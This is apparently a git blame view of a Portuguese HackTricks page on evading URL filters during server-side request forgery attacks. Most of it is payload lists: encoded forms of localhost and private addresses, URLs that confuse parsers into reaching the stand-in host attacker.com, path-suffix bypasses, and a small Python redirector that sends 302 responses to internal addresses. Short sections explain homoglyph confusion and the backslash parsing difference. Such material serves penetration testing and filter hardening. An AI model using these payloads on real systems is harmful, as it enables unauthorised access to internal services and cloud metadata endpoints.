hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

240 lines
13 KiB
Markdown
Raw Normal View History

2023-06-06 18:56:34 +00:00
# Bypass de Formato de URL
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
2023-06-06 18:56:34 +00:00
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-05-08 23:13:03 +00:00
### Localhost
2022-02-13 12:30:13 +00:00
```bash
2022-05-01 12:41:36 +00:00
# Localhost
2022-02-13 12:30:13 +00:00
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
2022-02-13 12:30:13 +00:00
http://0
2022-12-19 23:36:02 +00:00
http:@0/ --> http://localhost/
2022-02-13 12:30:13 +00:00
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪
2022-05-01 12:41:36 +00:00
# CDIR bypass
2022-02-13 12:30:13 +00:00
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821
2022-05-01 12:41:36 +00:00
# Decimal bypass
2022-02-13 12:30:13 +00:00
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
2022-05-01 12:41:36 +00:00
# Octal Bypass
2022-02-13 12:30:13 +00:00
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001
2022-05-01 12:41:36 +00:00
# Hexadecimal bypass
2022-02-13 12:30:13 +00:00
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001
# Add 0s bypass
127.000000000000.1
2022-05-01 12:41:36 +00:00
# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php
2022-02-13 12:30:13 +00:00
2022-05-01 12:41:36 +00:00
# Malformed and rare
2022-02-13 12:30:13 +00:00
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1
2022-05-01 12:41:36 +00:00
# DNS to localhost
2022-02-13 12:30:13 +00:00
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
O **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementa bypasses de formatação de IP.
2023-06-06 18:56:34 +00:00
### Analisador de Domínio
2022-02-13 12:30:13 +00:00
```bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
2023-01-02 12:00:18 +00:00
http://169.254.1698.254\@attacker.com
2022-02-13 12:30:13 +00:00
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
```
```
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
2023-06-06 18:56:34 +00:00
### Confusão de Domínio
Domain confusion is a technique used in Server-Side Request Forgery (SSRF) attacks to bypass URL-based filters. It involves manipulating the URL format to deceive the server into making unintended requests.
A common method of implementing domain confusion is by using look-alike characters or homoglyphs. These are characters that visually resemble other characters but have different Unicode representations. By replacing certain characters in the URL with their look-alike counterparts, an attacker can trick the server into sending requests to a different domain than intended.
For example, the attacker could replace the letter "o" in the domain name with the number "0" or the Cyrillic letter "о". This can lead to the server making requests to a malicious domain that the attacker controls.
To prevent domain confusion attacks, it is important to implement proper input validation and sanitization techniques. This includes validating and normalizing user input, as well as using whitelisting or strict input filtering to only allow specific characters in URLs.
By being aware of domain confusion and implementing appropriate security measures, developers can protect their applications from SSRF attacks that exploit URL format bypass vulnerabilities.
2022-02-13 12:30:13 +00:00
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
2022-02-13 12:30:13 +00:00
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
2022-02-13 12:30:13 +00:00
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
2022-02-13 12:30:13 +00:00
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
2022-02-13 12:30:13 +00:00
# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
#Parameter pollution
next={domain}&next=attacker.com
```
2023-06-06 18:56:34 +00:00
### Bypass de Caminhos e Extensões
2022-02-13 12:30:13 +00:00
Se for necessário que a URL termine em um caminho ou uma extensão, ou que contenha um caminho, você pode tentar um dos seguintes bypasses:
2022-04-20 09:04:20 +00:00
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
2022-12-05 11:09:36 +00:00
### Fuzzing
A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) pode gerar variações a partir de uma entrada fornecida para tentar burlar a regex utilizada. Confira [**este post**](https://0xacb.com/2022/11/21/recollapse/) também para mais informações.
2022-12-05 11:09:36 +00:00
2023-06-06 18:56:34 +00:00
### Bypass via redirecionamento
2022-02-13 12:30:13 +00:00
É possível que o servidor esteja **filtrando a requisição original** de um SSRF, **mas não** uma possível resposta de **redirecionamento** para essa requisição.\
Por exemplo, um servidor vulnerável a SSRF através de: `url=https://www.google.com/` pode estar **filtrando o parâmetro url**. Mas se você usar um [servidor python para responder com um 302](https://pastebin.com/raw/ywAUhFrv) para o local onde você deseja redirecionar, você pode ser capaz de **acessar endereços IP filtrados** como 127.0.0.1 ou até mesmo **protocolos filtrados** como gopher.\
2023-06-06 18:56:34 +00:00
[Confira este relatório.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
2022-02-13 12:30:13 +00:00
```python
#!/usr/bin/env python3
#python3 ./redirector.py 8000 http://127.0.0.1/
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()
2022-02-13 12:30:13 +00:00
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()
2022-02-13 12:30:13 +00:00
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
2023-06-06 18:56:34 +00:00
## Truques Explicados
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
### Truque da Barra Invertida
2022-02-13 12:30:13 +00:00
Em resumo, o _truque da barra invertida_ se baseia na exploração de uma pequena diferença entre duas especificações de "URL": o [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) e o [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). O RFC3986 é uma especificação genérica e multiuso para a sintaxe de _Uniform Resource Identifiers_ (Identificadores de Recursos Uniformes), enquanto o WHATWG URL Standard é especificamente voltado para a Web e para URLs (que são um subconjunto de URIs). Navegadores modernos implementam o WHATWG URL Standard.
2022-02-13 12:30:13 +00:00
Ambas as especificações descrevem uma maneira de analisar URI/URLs, com uma pequena diferença. A especificação WHATWG descreve [um caractere extra](https://url.spec.whatwg.org/#authority-state), a `\`, que se comporta exatamente como `/`: encerra o nome do host e a autoridade e inicia o caminho da URL.
2022-02-13 12:30:13 +00:00
![As duas especificações analisando a mesma URL de forma diferente](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
### Outras Confusões
2022-02-13 12:30:13 +00:00
![](<../../.gitbook/assets/image (629).png>)
2023-06-06 18:56:34 +00:00
imagem de [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
2022-04-28 16:01:33 +00:00
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre as vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
2023-06-06 18:56:34 +00:00
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2023-06-06 18:56:34 +00:00
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>